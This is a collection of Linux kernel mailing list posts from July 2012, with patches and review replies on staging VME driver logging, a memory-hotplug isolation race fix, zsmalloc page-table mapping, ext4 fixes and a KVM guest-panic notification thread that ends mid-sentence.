 2 files changed, 36 insertions(+), 45 deletions(-)

diff --git a/drivers/staging/vme/devices/vme_pio2_core.c 
b/drivers/staging/vme/devices/vme_pio2_core.c
index 4bf8e05..dad8281 100644
--- a/drivers/staging/vme/devices/vme_pio2_core.c
+++ b/drivers/staging/vme/devices/vme_pio2_core.c
@@ -10,6 +10,8 @@
  * option) any later version.
  */
 
+#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+
 #include 
 #include 
 #include 
@@ -163,15 +165,13 @@ static int __init pio2_init(void)
int retval = 0;
 
if (bus_num == 0) {
-   printk(KERN_ERR "%s: No cards, skipping registration\n",
-   driver_name);
+   pr_err("No cards, skipping registration\n");
goto err_nocard;
}
 
if (bus_num > PIO2_CARDS_MAX) {
-   printk(KERN_ERR
-   "%s: Driver only able to handle %d PIO2 Cards\n",
-   driver_name, PIO2_CARDS_MAX);
+   pr_err("Driver only able to handle %d PIO2 Cards\n",
+  PIO2_CARDS_MAX);
bus_num = PIO2_CARDS_MAX;
}
 
diff --git a/drivers/staging/vme/devices/vme_user.c 
b/drivers/staging/vme/devices/vme_user.c
index e25645e..7d28086 100644
--- a/drivers/staging/vme/devices/vme_user.c
+++ b/drivers/staging/vme/devices/vme_user.c
@@ -15,6 +15,8 @@
  * option) any later version.
  */
 
+#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+
 #include 
 #include 
 #include 
@@ -170,7 +172,7 @@ static int vme_user_open(struct inode *inode, struct file 
*file)
mutex_lock(&image[minor].mutex);
/* Allow device to be opened if a resource is needed and allocated. */
if (minor < CONTROL_MINOR && image[minor].resource == NULL) {
-   printk(KERN_ERR "No resources allocated for device\n");
+   pr_err("No resources allocated for device\n");
err = -EINVAL;
goto err_res;
}
@@ -225,13 +227,13 @@ static ssize_t resource_to_user(int minor, char __user 
*buf, size_t count,
(unsigned long)copied);
if (retval != 0) {
copied = (copied - retval);
-   printk(KERN_INFO "User copy failed\n");
+   pr_info("User copy failed\n");
return -EINVAL;
}
 
} else {
/* XXX Need to write this */
-   printk(KERN_INFO "Currently don't support large transfers\n");
+   pr_info("Currently don't support large transfers\n");
/* Map in pages from userspace */
 
/* Call vme_master_read to do the transfer */
@@ -265,7 +267,7 @@ static ssize_t resource_from_user(unsigned int minor, const 
char __user *buf,
image[minor].kern_buf, copied, *ppos);
} else {
/* XXX Need to write this */
-   printk(KERN_INFO "Currently don't support large transfers\n");
+   pr_info("Currently don't support large transfers\n");
/* Map in pages from userspace */
 
/* Call vme_master_write to do the transfer */
@@ -286,7 +288,7 @@ static ssize_t buffer_to_user(unsigned int minor, char 
__user *buf,
retval = __copy_to_user(buf, image_ptr, (unsigned long)count);
if (retval != 0) {
retval = (count - retval);
-   printk(KERN_WARNING "Partial copy to userspace\n");
+   pr_warn("Partial copy to userspace\n");
} else
retval = count;
 
@@ -305,7 +307,7 @@ static ssize_t buffer_from_user(unsigned int minor, const 
char __user *buf,
retval = __copy_from_user(image_ptr, buf, (unsigned long)count);
if (retval != 0) {
retval = (count - retval);
-   printk(KERN_WARNING "Partial copy to userspace\n");
+   pr_warn("Partial copy to userspace\n");
} else
retval = count;
 
@@ -396,7 +398,7 @@ static ssize_t vme_user_write(struct file *file, const char 
__user *buf,
default:
retval = -EINVAL;
}
-   
+
mutex_unlock(&image[minor].mutex);
 
if (retval > 0)
@@ -476,7 +478,7 @@ static int vme_user_ioctl(struct inode *inode, struct file 
*file,
  

Re: [PATCH] sctp: Make "Invalid Stream Identifier" ERROR follows SACK when bundling

2012-07-22 Thread Neil Horman
On Thu, Jul 19, 2012 at 01:57:30PM +0800, xufengzhang.m...@gmail.com wrote:
> When "Invalid Stream Identifier" ERROR happens after process the
> received DATA chunks, this ERROR chunk is enqueued into outqueue
> before SACK chunk, so when bundling ERROR chunk with SACK chunk,
> the ERROR chunk is always placed first in the packet because of
> the chunk's position in the outqueue.
> This violates sctp specification:
> RFC 4960 6.5. Stream Identifier and Stream Sequence Number
> ...The endpoint may bundle the ERROR chunk in the same
> packet as the SACK as long as the ERROR follows the SACK.
> So we must place SACK first when bundling "Invalid Stream Identifier"
> ERROR and SACK in one packet.
> Although we can do that by enqueue SACK chunk into outqueue before
> ERROR chunk, it will violate the side-effect interpreter processing.
> It's easy to do this job when dequeue chunks from the outqueue,
> by this way, we introduce a flag 'has_isi_err' which indicate
> whether or not the "Invalid Stream Identifier" ERROR happens.
> 
> Signed-off-by: Xufeng Zhang 

Not sure I understand how you came into this error.  If we get an invalid
stream, we issue an SCTP_REPORT_TSN side effect, followed by an SCTP_CMD_REPLY
which sends the error chunk.  The reply goes through
sctp_outq_tail->sctp_outq_chunk->sctp_outq_transmit_chunk->sctp_outq_append_chunk.
That last function checks to see if a sack is already part of the packet, and if
there isn't one, appends one, using the updated tsn map.  So can you explain in
some more detail how you're getting into this situation?

Thanks!
Neil



[RESEND RFC 1/3] mm: use get_page_migratetype instead of page_private

2012-07-22 Thread Minchan Kim
The page allocator uses set_page_private and page_private to handle the
migratetype when it frees a page. Let's replace them with
[set|get]_page_migratetype to make the intent clearer.

Signed-off-by: Minchan Kim 
---
 include/linux/mm.h  |   10 ++
 mm/page_alloc.c |   11 +++
 mm/page_isolation.c |2 +-
 3 files changed, 18 insertions(+), 5 deletions(-)

diff --git a/include/linux/mm.h b/include/linux/mm.h
index 5c76634..86d61d6 100644
--- a/include/linux/mm.h
+++ b/include/linux/mm.h
@@ -249,6 +249,16 @@ struct inode;
 #define page_private(page) ((page)->private)
 #define set_page_private(page, v)  ((page)->private = (v))
 
+static inline void set_page_migratetype(struct page *page, int migratetype)
+{
+   set_page_private(page, migratetype);
+}
+
+static inline int get_page_migratetype(struct page *page)
+{
+   return page_private(page);
+}
+
 /*
  * FIXME: take this include out, include page-flags.h in
  * files which need it (119 of them)
diff --git a/mm/page_alloc.c b/mm/page_alloc.c
index 710d91c..103ba66 100644
--- a/mm/page_alloc.c
+++ b/mm/page_alloc.c
@@ -671,8 +671,10 @@ static void free_pcppages_bulk(struct zone *zone, int 
count,
/* must delete as __free_one_page list manipulates */
list_del(&page->lru);
/* MIGRATE_MOVABLE list may include MIGRATE_RESERVEs */
-   __free_one_page(page, zone, 0, page_private(page));
-   trace_mm_page_pcpu_drain(page, 0, page_private(page));
+   __free_one_page(page, zone, 0,
+   get_page_migratetype(page));
+   trace_mm_page_pcpu_drain(page, 0,
+   get_page_migratetype(page));
} while (--to_free && --batch_free && !list_empty(list));
}
__mod_zone_page_state(zone, NR_FREE_PAGES, count);
@@ -731,6 +733,7 @@ static void __free_pages_ok(struct page *page, unsigned int 
order)
__count_vm_events(PGFREE, 1 << order);
free_one_page(page_zone(page), page, order,
get_pageblock_migratetype(page));
+
local_irq_restore(flags);
 }
 
@@ -1134,7 +1137,7 @@ static int rmqueue_bulk(struct zone *zone, unsigned int 
order,
if (!is_migrate_cma(mt) && mt != MIGRATE_ISOLATE)
mt = migratetype;
}
-   set_page_private(page, mt);
+   set_page_migratetype(page, mt);
list = &page->lru;
}
__mod_zone_page_state(zone, NR_FREE_PAGES, -(i << order));
@@ -1301,7 +1304,7 @@ void free_hot_cold_page(struct page *page, int cold)
return;
 
migratetype = get_pageblock_migratetype(page);
-   set_page_private(page, migratetype);
+   set_page_migratetype(page, migratetype);
local_irq_save(flags);
if (unlikely(wasMlocked))
free_page_mlock(page);
diff --git a/mm/page_isolation.c b/mm/page_isolation.c
index 64abb33..acf65a7 100644
--- a/mm/page_isolation.c
+++ b/mm/page_isolation.c
@@ -199,7 +199,7 @@ __test_page_isolated_in_pageblock(unsigned long pfn, 
unsigned long end_pfn)
if (PageBuddy(page))
pfn += 1 << page_order(page);
else if (page_count(page) == 0 &&
-   page_private(page) == MIGRATE_ISOLATE)
+   get_page_migratetype(page) == MIGRATE_ISOLATE)
pfn += 1;
else
break;
-- 
1.7.9.5



[RESEND RFC 2/3] mm: remain migratetype in freed page

2012-07-22 Thread Minchan Kim
The page allocator doesn't keep the migratetype in the page when the
page is freed. This patch keeps that information in the freed page's
index field, which isn't used by the free/alloc preparation paths, so
it shouldn't change any behavior except the one below.

This patch adds a new call site in __free_pages_ok, so it might add a
little overhead, but that path is only for high-order allocations, so
I believe the cost is negligible.

Signed-off-by: Minchan Kim 
---
 include/linux/mm.h |6 --
 mm/page_alloc.c|7 ---
 2 files changed, 8 insertions(+), 5 deletions(-)

diff --git a/include/linux/mm.h b/include/linux/mm.h
index 86d61d6..8fd32da 100644
--- a/include/linux/mm.h
+++ b/include/linux/mm.h
@@ -251,12 +251,14 @@ struct inode;
 
 static inline void set_page_migratetype(struct page *page, int migratetype)
 {
-   set_page_private(page, migratetype);
+   VM_BUG_ON((unsigned int)migratetype >= MIGRATE_TYPES);
+   page->index = migratetype;
 }
 
 static inline int get_page_migratetype(struct page *page)
 {
-   return page_private(page);
+   VM_BUG_ON((unsigned int)page->index >= MIGRATE_TYPES);
+   return page->index;
 }
 
 /*
diff --git a/mm/page_alloc.c b/mm/page_alloc.c
index 103ba66..32985dd 100644
--- a/mm/page_alloc.c
+++ b/mm/page_alloc.c
@@ -723,6 +723,7 @@ static void __free_pages_ok(struct page *page, unsigned int 
order)
 {
unsigned long flags;
int wasMlocked = __TestClearPageMlocked(page);
+   int migratetype;
 
if (!free_pages_prepare(page, order))
return;
@@ -731,9 +732,9 @@ static void __free_pages_ok(struct page *page, unsigned int 
order)
if (unlikely(wasMlocked))
free_page_mlock(page);
__count_vm_events(PGFREE, 1 << order);
-   free_one_page(page_zone(page), page, order,
-   get_pageblock_migratetype(page));
-
+   migratetype = get_pageblock_migratetype(page);
+   set_page_migratetype(page, migratetype);
+   free_one_page(page_zone(page), page, order, migratetype);
local_irq_restore(flags);
 }
 
-- 
1.7.9.5
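
To illustrate the idea in the changelog, here is a userspace sketch rather
than kernel code. struct fake_page, set_buddy_order() and the enum values are
stand-ins invented for the example. It assumes that the private field gets
reused for the buddy order once a page sits on a free list, which is why a
migratetype stored there would not survive, while one stored in index does.

```c
#include <assert.h>

/* Illustrative values only; the real enum depends on kernel config. */
enum { MIGRATE_MOVABLE = 2, MIGRATE_ISOLATE = 4, MIGRATE_TYPES = 5 };

/* Stand-in for the two struct page fields involved. */
struct fake_page {
	unsigned long private;	/* reused for the buddy order after freeing */
	unsigned long index;	/* where this patch keeps the migratetype */
};

static void set_page_migratetype(struct fake_page *page, int migratetype)
{
	assert((unsigned int)migratetype < MIGRATE_TYPES); /* VM_BUG_ON analogue */
	page->index = (unsigned long)migratetype;
}

static int get_page_migratetype(const struct fake_page *page)
{
	assert(page->index < MIGRATE_TYPES);
	return (int)page->index;
}

/* Hypothetical model of the buddy allocator recording a free page's order. */
static void set_buddy_order(struct fake_page *page, unsigned int order)
{
	page->private = order;
}
```

Calling set_page_migratetype() and then set_buddy_order() on the same page
leaves both values readable, since they no longer share a field.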



[RESEND RFC 3/3] memory-hotplug: bug fix race between isolation and allocation

2012-07-22 Thread Minchan Kim
As shown below, memory-hotplug has a race between page isolation and
page allocation, so it can hit the BUG_ON in __offline_isolated_pages.

        CPU A                           CPU B

start_isolate_page_range
set_migratetype_isolate
spin_lock_irqsave(zone->lock)

                                free_hot_cold_page(Page A)
                                /* without zone->lock */
                                migratetype = get_pageblock_migratetype(Page A);
                                /*
                                 * Page could be moved into MIGRATE_MOVABLE
                                 * of per_cpu_pages
                                 */
                                list_add_tail(&page->lru, &pcp->lists[migratetype]);

set_pageblock_isolate
move_freepages_block
drain_all_pages

                                /* Page A could be in MIGRATE_MOVABLE of free_list. */

check_pages_isolated
__test_page_isolated_in_pageblock
/*
 * We can't catch freed page which
 * is free_list[MIGRATE_MOVABLE]
 */
if (PageBuddy(page A))
        pfn += 1 << page_order(page A);

                                /* So, Page A could be allocated */

__offline_isolated_pages
/*
 * BUG_ON hit or offline page
 * which is used by someone
 */
BUG_ON(!PageBuddy(page A));

Signed-off-by: Minchan Kim 
---
I found this problem during code review so please confirm it.
Kame?

 mm/page_isolation.c |5 -
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/mm/page_isolation.c b/mm/page_isolation.c
index acf65a7..4699d1f 100644
--- a/mm/page_isolation.c
+++ b/mm/page_isolation.c
@@ -196,8 +196,11 @@ __test_page_isolated_in_pageblock(unsigned long pfn, 
unsigned long end_pfn)
continue;
}
page = pfn_to_page(pfn);
-   if (PageBuddy(page))
+   if (PageBuddy(page)) {
+   if (get_page_migratetype(page) != MIGRATE_ISOLATE)
+   break;
pfn += 1 << page_order(page);
+   }
else if (page_count(page) == 0 &&
get_page_migratetype(page) == MIGRATE_ISOLATE)
pfn += 1;
-- 
1.7.9.5
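
The effect of the hunk above can be sketched outside the kernel. This is a
simplified model, assuming a flat array of pages; struct fake_page,
range_isolated() and the check_buddy_type switch are invented for the
example, and the enum values are illustrative.

```c
#include <stdbool.h>
#include <stddef.h>

/* Illustrative values only; the real enum depends on kernel config. */
enum { MIGRATE_MOVABLE = 2, MIGRATE_ISOLATE = 4 };

/* Stand-in for the struct page state the isolation test looks at. */
struct fake_page {
	bool buddy;		/* PageBuddy(): page is on a free list */
	unsigned int order;	/* page_order(): only valid when buddy */
	int count;		/* page_count() */
	int migratetype;	/* get_page_migratetype() */
};

/*
 * Walks pages[0..nr) the way __test_page_isolated_in_pageblock() does and
 * returns true when the whole range looks isolated. check_buddy_type
 * selects the patched behaviour (true) or the old one (false).
 */
static bool range_isolated(const struct fake_page *pages, size_t nr,
			   bool check_buddy_type)
{
	size_t pfn = 0;

	while (pfn < nr) {
		const struct fake_page *page = &pages[pfn];

		if (page->buddy) {
			if (check_buddy_type &&
			    page->migratetype != MIGRATE_ISOLATE)
				break;	/* free, but on the wrong free list */
			pfn += (size_t)1 << page->order;
		} else if (page->count == 0 &&
			   page->migratetype == MIGRATE_ISOLATE) {
			pfn += 1;
		} else {
			break;
		}
	}
	return pfn >= nr;
}
```

With check_buddy_type false, a free buddy page still tagged MIGRATE_MOVABLE
is skipped and the range is reported as isolated; with it true, the scan
stops at that page.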



[RESEND RFC 0/3] memory-hotplug: handle page race between allocation and isolation

2012-07-22 Thread Minchan Kim
Memory hotplug has a subtle race, and this patchset fixes it.
(See [3/3] for details, and please confirm the problem before reviewing
the other patches in this series.)

 [1/3] is just a cleanup that prepares for [2/3].
 [2/3] keeps the migratetype information in the freed page's index field
       so that [3/3] can use it.
 [3/3] fixes the race using the information from [2/3].

After applying [2/3], the migratetype argument of __free_one_page
and free_one_page is redundant and could be removed, but I decided
not to touch them because doing so increases code size by about 50 bytes.

Minchan Kim (3):
  mm: use get_page_migratetype instead of page_private
  mm: remain migratetype in freed page
  memory-hotplug: bug fix race between isolation and allocation

 include/linux/mm.h  |   12 
 mm/page_alloc.c |   16 ++--
 mm/page_isolation.c |7 +--
 3 files changed, 27 insertions(+), 8 deletions(-)

-- 
1.7.9.5



Re: [PATCH 3/3] zsmalloc: add page table mapping method

2012-07-22 Thread Minchan Kim
Hi Seth,

On Sun, Jul 22, 2012 at 07:33:40PM -0500, Seth Jennings wrote:
> On 07/22/2012 07:26 PM, Minchan Kim wrote:
> > On Wed, Jul 18, 2012 at 11:55:56AM -0500, Seth Jennings wrote:
> >> This patchset provides page mapping via the page table.
> >> On some archs, most notably ARM, this method has been
> >> demonstrated to be faster than copying.
> >>
> >> The logic controlling the method selection (copy vs page table)
> >> is controlled by the definition of USE_PGTABLE_MAPPING which
> >> is/can be defined for any arch that performs better with page
> >> table mapping.
> >>
> >> Signed-off-by: Seth Jennings 
> >> ---
> >>  drivers/staging/zsmalloc/zsmalloc-main.c |  182 
> >> ++
> >>  drivers/staging/zsmalloc/zsmalloc_int.h  |6 -
> >>  2 files changed, 134 insertions(+), 54 deletions(-)
> >>
> >> diff --git a/drivers/staging/zsmalloc/zsmalloc-main.c 
> >> b/drivers/staging/zsmalloc/zsmalloc-main.c
> >> index b86133f..defe350 100644
> >> --- a/drivers/staging/zsmalloc/zsmalloc-main.c
> >> +++ b/drivers/staging/zsmalloc/zsmalloc-main.c
> >> @@ -89,6 +89,30 @@
> >>  #define CLASS_IDX_MASK((1 << CLASS_IDX_BITS) - 1)
> >>  #define FULLNESS_MASK ((1 << FULLNESS_BITS) - 1)
> >>  
> >> +/*
> >> + * By default, zsmalloc uses a copy-based object mapping method to access
> >> + * allocations that span two pages. However, if a particular architecture
> >> + * 1) Implements local_flush_tlb_kernel_range() and 2) Performs VM mapping
> >> + * faster than copying, then it should be added here so that
> > 
> > How about adding your benchmark url?
> > 
> >> + * USE_PGTABLE_MAPPING is defined. This causes zsmalloc to use page table
> >> + * mapping rather than copying
> >> + * for object mapping.
> > 
> > unnecessary new line.
> 
> Since these aren't functional issues with the code, if I
> _promise_ to send a follow-up patch to address these, can I
> get your Ack?

Sure!

Thanks for your effort!

-- 
Kind regards,
Minchan Kim


RE: [PATCH] regulator: Use BUCK_FPWM_[MASK|SHIFT] macros to replace buck_pmap table

2012-07-22 Thread Kim, Milo
> This patch defines BUCK_FPWM_MASK and BUCK_FPWM_SHIFT macros to replace
> buck_pmap mapping table.
> 
> Signed-off-by: Axel Lin 

Acked-by: Milo(Woogyom) Kim 
Tested-by: Milo(Woogyom) Kim 

Thanks !

Best Regards,
Milo


RE: [PATCH] regulator: lp8788-ldo: Set n_voltages to 1 for fixed voltage

2012-07-22 Thread Kim, Milo
> For fixed voltage, the n_voltages should be 1 rather than 0.
> 
> Signed-off-by: Axel Lin 

Acked-by: Milo(Woogyom) Kim 

Thanks !

Best Regards,
Milo


Re: [PATCH v3] ext4: fix hole punch failure when depth is greater than 0

2012-07-22 Thread Theodore Ts'o
On Tue, Jul 10, 2012 at 09:56:10PM +0530, Ashish Sangwan wrote:
> Whether to continue removing extents or not is decided by the return value
> of function ext4_ext_more_to_rm() which checks 2 conditions:
> a) if there are no more indexes to process.
> b) if the number of entries are decreased in the header of "depth -1".
> 
> In case of hole punch, if the last block to be removed is not part of the
> last extent index then this index will not be deleted, hence the number of
> valid entries in the extent header of "depth - 1" will remain as it is and
> ext4_ext_more_to_rm will return 0 although the required blocks are not
> yet removed.
> 
> This patch fixes the above mentioned problem as instead of removing the
> extents from the end of file, it starts removing the blocks from the
> particular extent from which removing blocks is actually required and
> continue backward until done.
> 
> Signed-off-by: Ashish Sangwan 
> Signed-off-by: Namjae Jeon 
> Reviewed-by: Lukas Czerner 

Applied, with a cc: to sta...@kernel.org since it is a bug fix.

Thanks for submitting this patch!

  - Ted


Re: [PATCH 3/3] zsmalloc: add page table mapping method

2012-07-22 Thread Seth Jennings
On 07/22/2012 07:26 PM, Minchan Kim wrote:
> On Wed, Jul 18, 2012 at 11:55:56AM -0500, Seth Jennings wrote:
>> This patchset provides page mapping via the page table.
>> On some archs, most notably ARM, this method has been
>> demonstrated to be faster than copying.
>>
>> The logic controlling the method selection (copy vs page table)
>> is controlled by the definition of USE_PGTABLE_MAPPING which
>> is/can be defined for any arch that performs better with page
>> table mapping.
>>
>> Signed-off-by: Seth Jennings 
>> ---
>>  drivers/staging/zsmalloc/zsmalloc-main.c |  182 
>> ++
>>  drivers/staging/zsmalloc/zsmalloc_int.h  |6 -
>>  2 files changed, 134 insertions(+), 54 deletions(-)
>>
>> diff --git a/drivers/staging/zsmalloc/zsmalloc-main.c 
>> b/drivers/staging/zsmalloc/zsmalloc-main.c
>> index b86133f..defe350 100644
>> --- a/drivers/staging/zsmalloc/zsmalloc-main.c
>> +++ b/drivers/staging/zsmalloc/zsmalloc-main.c
>> @@ -89,6 +89,30 @@
>>  #define CLASS_IDX_MASK  ((1 << CLASS_IDX_BITS) - 1)
>>  #define FULLNESS_MASK   ((1 << FULLNESS_BITS) - 1)
>>  
>> +/*
>> + * By default, zsmalloc uses a copy-based object mapping method to access
>> + * allocations that span two pages. However, if a particular architecture
>> + * 1) Implements local_flush_tlb_kernel_range() and 2) Performs VM mapping
>> + * faster than copying, then it should be added here so that
> 
> How about adding your benchmark url?
> 
>> + * USE_PGTABLE_MAPPING is defined. This causes zsmalloc to use page table
>> + * mapping rather than copying
>> + * for object mapping.
> 
> unnecessary new line.

Since these aren't functional issues with the code, if I
_promise_ to send a follow-up patch to address these, can I
get your Ack?

--
Seth



Re: [PATCH 3/3] zsmalloc: add page table mapping method

2012-07-22 Thread Minchan Kim
On Wed, Jul 18, 2012 at 11:55:56AM -0500, Seth Jennings wrote:
> This patchset provides page mapping via the page table.
> On some archs, most notably ARM, this method has been
> demonstrated to be faster than copying.
> 
> The logic controlling the method selection (copy vs page table)
> is controlled by the definition of USE_PGTABLE_MAPPING which
> is/can be defined for any arch that performs better with page
> table mapping.
> 
> Signed-off-by: Seth Jennings 
> ---
>  drivers/staging/zsmalloc/zsmalloc-main.c |  182 
> ++
>  drivers/staging/zsmalloc/zsmalloc_int.h  |6 -
>  2 files changed, 134 insertions(+), 54 deletions(-)
> 
> diff --git a/drivers/staging/zsmalloc/zsmalloc-main.c b/drivers/staging/zsmalloc/zsmalloc-main.c
> index b86133f..defe350 100644
> --- a/drivers/staging/zsmalloc/zsmalloc-main.c
> +++ b/drivers/staging/zsmalloc/zsmalloc-main.c
> @@ -89,6 +89,30 @@
>  #define CLASS_IDX_MASK   ((1 << CLASS_IDX_BITS) - 1)
>  #define FULLNESS_MASK((1 << FULLNESS_BITS) - 1)
>  
> +/*
> + * By default, zsmalloc uses a copy-based object mapping method to access
> + * allocations that span two pages. However, if a particular architecture
> + * 1) Implements local_flush_tlb_kernel_range() and 2) Performs VM mapping
> + * faster than copying, then it should be added here so that

How about adding your benchmark url?

> + * USE_PGTABLE_MAPPING is defined. This causes zsmalloc to use page table
> + * mapping rather than copying
> + * for object mapping.

unnecessary new line.

> +*/
> +#if defined(CONFIG_ARM)
> +#define USE_PGTABLE_MAPPING
> +#endif

I had no better idea and I would like to add zsmalloc into mainline.
So no objection.
Nitin?

> +
> +struct mapping_area {
> +#ifdef USE_PGTABLE_MAPPING
> + struct vm_struct *vm; /* vm area for mapping object that span pages */
> +#else
> + char *vm_buf; /* copy buffer for objects that span pages */
> +#endif
> + char *vm_addr; /* address of kmap_atomic()'ed pages */
> + enum zs_mapmode vm_mm; /* mapping mode */
> +};
> +
> +
>  /* per-cpu VM mapping areas for zspage accesses that cross page boundaries */
>  static DEFINE_PER_CPU(struct mapping_area, zs_map_area);
>  
> @@ -471,16 +495,83 @@ static struct page *find_get_zspage(struct size_class *class)
>   return page;
>  }
>  
> -static void zs_copy_map_object(char *buf, struct page *page,
> - int off, int size)
> +#ifdef USE_PGTABLE_MAPPING
> +static inline int __zs_cpu_up(struct mapping_area *area)
> +{
> + /*
> +  * Make sure we don't leak memory if a cpu UP notification
> +  * and zs_init() race and both call zs_cpu_up() on the same cpu
> +  */
> + if (area->vm)
> + return 0;
> + area->vm = alloc_vm_area(PAGE_SIZE * 2, NULL);
> + if (!area->vm)
> + return -ENOMEM;
> + return 0;
> +}
> +
> +static inline void __zs_cpu_down(struct mapping_area *area)
> +{
> + if (area->vm)
> + free_vm_area(area->vm);
> + area->vm = NULL;
> +}
> +
> +static inline void *__zs_map_object(struct mapping_area *area,
> + struct page *pages[2], int off, int size)
> +{
> + BUG_ON(map_vm_area(area->vm, PAGE_KERNEL, &pages));
> + area->vm_addr = area->vm->addr;
> + return area->vm_addr + off;
> +}
> +
> +static inline void __zs_unmap_object(struct mapping_area *area,
> + struct page *pages[2], int off, int size)
> +{
> + unsigned long addr = (unsigned long)area->vm_addr;
> + unsigned long end = addr + (PAGE_SIZE * 2);
> +
> + flush_cache_vunmap(addr, end);
> + unmap_kernel_range_noflush(addr, PAGE_SIZE * 2);
> + local_flush_tlb_kernel_range(addr, end);
> +}
> +
> +#else /* USE_PGTABLE_MAPPING */
> +
> +static inline int __zs_cpu_up(struct mapping_area *area)
> +{
> + /*
> +  * Make sure we don't leak memory if a cpu UP notification
> +  * and zs_init() race and both call zs_cpu_up() on the same cpu
> +  */
> + if (area->vm_buf)
> + return 0;
> + area->vm_buf = (char *)__get_free_page(GFP_KERNEL);
> + if (!area->vm_buf)
> + return -ENOMEM;
> + return 0;
> +}
> +
> +static inline void __zs_cpu_down(struct mapping_area *area)
> +{
> + if (area->vm_buf)
> + free_page((unsigned long)area->vm_buf);
> + area->vm_buf = NULL;
> +}
> +
> +static void *__zs_map_object(struct mapping_area *area,
> + struct page *pages[2], int off, int size)
>  {
> - struct page *pages[2];
>   int sizes[2];
>   void *addr;
> + char *buf = area->vm_buf;
>  
> - pages[0] = page;
> - pages[1] = get_next_page(page);
> - BUG_ON(!pages[1]);
> + /* disable page faults to match kmap_atomic() return conditions */
> + pagefault_disable();
> +
> + /* no read fastpath */
> + if (area->vm_mm == ZS_MM_WO)
> + goto out;
>  
>   sizes[0] = PAGE_SIZE - off;
>   sizes[
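
The copy-based path that the truncated hunk above starts to show can be
sketched in userspace roughly as follows. This is only an illustration under
stated assumptions, not the patch's code: SKETCH_PAGE_SIZE, sketch_split(),
sketch_copy_in() and sketch_copy_out() are hypothetical names, plain char
arrays stand in for kmap_atomic()'ed pages, and the sizes[1] computation is
an assumption because the quoted patch is cut off before that line.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define SKETCH_PAGE_SIZE 4096u	/* assumed page size, for illustration only */

/* Split an object at offset off into its part on page 0 and page 1. */
void sketch_split(size_t off, size_t size, size_t sizes[2])
{
	assert(off < SKETCH_PAGE_SIZE);
	assert(size <= SKETCH_PAGE_SIZE);
	assert(off + size > SKETCH_PAGE_SIZE);	/* object must span both pages */

	sizes[0] = SKETCH_PAGE_SIZE - off;	/* tail of the first page */
	sizes[1] = size - sizes[0];		/* assumed: rest starts the second page */
}

/* "Map": gather the two pieces into one contiguous buffer. */
void sketch_copy_in(char *buf, char *const pages[2], size_t off, size_t size)
{
	size_t sizes[2];

	sketch_split(off, size, sizes);
	memcpy(buf, pages[0] + off, sizes[0]);
	memcpy(buf + sizes[0], pages[1], sizes[1]);
}

/* "Unmap": scatter the buffer back to the two pages. */
void sketch_copy_out(const char *buf, char *const pages[2], size_t off, size_t size)
{
	size_t sizes[2];

	sketch_split(off, size, sizes);
	memcpy(pages[0] + off, buf, sizes[0]);
	memcpy(pages[1], buf + sizes[0], sizes[1]);
}
```

A write-only mapping could skip sketch_copy_in() entirely, which appears to be
what the "no read fastpath" check on ZS_MM_WO in the hunk is for.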

Re: [patch -next] ext4: locking issue on error path

2012-07-22 Thread Theodore Ts'o
On Tue, Jul 17, 2012 at 04:13:51PM +0800, Zheng Liu wrote:
> On Tue, Jul 17, 2012 at 09:31:06AM +0300, Dan Carpenter wrote:
> > We recently changed how the locking worked here, but this error path was
> > missed.
> > 
> > Signed-off-by: Dan Carpenter 
> 
> Sorry, it is my fault.  Thanks for pointing out this bug.

Since this patch hadn't been promoted past the master branch pointer
(it was only in the dev branch, which can be rebased), I've merged
this fix up with Zheng's original patch.

Dan, many thanks for finding and pointing it out!!

- Ted


Re: [PATCH 2/3] zsmalloc: prevent mappping in interrupt context

2012-07-22 Thread Minchan Kim
On Wed, Jul 18, 2012 at 11:55:55AM -0500, Seth Jennings wrote:
> Because we use per-cpu mapping areas shared among the
> pools/users, we can't allow mapping in interrupt context
> because it can corrupt another users mappings.
> 
> Signed-off-by: Seth Jennings 
Acked-by: Minchan Kim 

-- 
Kind regards,
Minchan Kim


Re: [PATCH 1/3] zsmalloc: s/firstpage/page in new copy map funcs

2012-07-22 Thread Minchan Kim
On Wed, Jul 18, 2012 at 11:55:54AM -0500, Seth Jennings wrote:
> firstpage already has precedent and meaning the first page
> of a zspage.  In the case of the copy mapping functions,
> it is the first of a pair of pages needing to be mapped.
> 
> This patch just renames the firstpage argument to "page" to
> avoid confusion.
> 
> Signed-off-by: Seth Jennings 
Acked-by: Minchan Kim 

-- 
Kind regards,
Minchan Kim


Re: [PATCHv7 0/5] ext4: stop using write_supers and s_dirt

2012-07-22 Thread Theodore Ts'o
On Wed, Jul 11, 2012 at 04:46:39PM +0300, Artem Bityutskiy wrote:
> This patch-set makes ext4 file-system stop using the VFS '->write_supers()'
> call-back and the '->s_dirt' superblock field because I plan to remove them
> once all users are gone.

I've applied this patch series, thanks.

- Ted


Re: [Qemu-devel] [PATCH v7.5] kvm: notify host when the guest is panicked

2012-07-22 Thread Sasha Levin
On 07/23/2012 12:36 AM, Anthony Liguori wrote:
> Sasha Levin  writes:
> 
>> On 07/22/2012 09:14 PM, Anthony Liguori wrote:
>>> Sasha Levin  writes:
>>>
>>>> On 07/21/2012 10:44 AM, Wen Congyang wrote:
>>>>> We can know the guest is panicked when the guest runs on xen.
>>>>> But we do not have such feature on kvm.
>>>>>
>>>>> Another purpose of this feature is: management app(for example:
>>>>> libvirt) can do auto dump when the guest is panicked. If management
>>>>> app does not do auto dump, the guest's user can do dump by hand if
>>>>> he sees the guest is panicked.
>>>>>
>>>>> We have three solutions to implement this feature:
>>>>> 1. use vmcall
>>>>> 2. use I/O port
>>>>> 3. use virtio-serial.
>>>>>
>>>>> We have decided to avoid touching hypervisor. The reason why I choose
>>>>> choose the I/O port is:
>>>>> 1. it is easier to implememt
>>>>> 2. it does not depend any virtual device
>>>>> 3. it can work when starting the kernel
>>>>
>>>> Was the option of implementing a virtio-watchdog driver considered?
>>>>
>>>> You're basically re-implementing a watchdog, a guest-host interface and a 
>>>> set of protocols for guest-host communications.
>>>>
>>>> Why can't we re-use everything we have now, push a virtio watchdog
>>>> driver into drivers/watchdog/, and gain a more complete solution to
>>>> detecting hangs inside the guest.
>>>
>>> The purpose of virtio is not to reinvent every possible type of device.
>>> There are plenty of hardware watchdogs that are very suitable to be used
>>> for this purpose.  QEMU implements quite a few already.
>>>
>>> Watchdogs are not performance sensitive so there's no point in using
>>> virtio.
>>
>> The issue here is not performance, but the adding of a brand new
>> guest-host interface.
> 
> We have:
> 
